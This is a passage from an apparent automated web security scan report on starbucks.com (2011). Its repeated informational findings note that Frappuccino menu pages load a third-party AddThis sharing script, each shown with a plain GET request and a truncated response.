<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.129. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:18 GMT
Connection: close
Content-Length: 45265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.130. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:00 GMT
Connection: close
Content-Length: 45316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.131. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:19 GMT
Connection: close
Content-Length: 43130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.132. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:21 GMT
Connection: close
Content-Length: 44774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.133. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:24 GMT
Connection: close
Content-Length: 44905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.134. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:33 GMT
Connection: close
Content-Length: 45757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.135. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:42 GMT
Connection: close
Content-Length: 44829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.136. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:59 GMT
Connection: close
Content-Length: 45009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.137. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:26 GMT
Connection: close
Content-Length: 45025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.138. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:18 GMT
Connection: close
Content-Length: 45252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.139. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:23 GMT
Connection: close
Content-Length: 44851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.140. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:56 GMT
Connection: close
Content-Length: 45064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.141. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:59 GMT
Connection: close
Content-Length: 45012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:24 GMT
Connection: close
Content-Length: 43544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:37 GMT
Connection: close
Content-Length: 42777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:40 GMT
Connection: close
Content-Length: 44826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:43 GMT
Connection: close
Content-Length: 45102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:49 GMT
Connection: close
Content-Length: 43123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
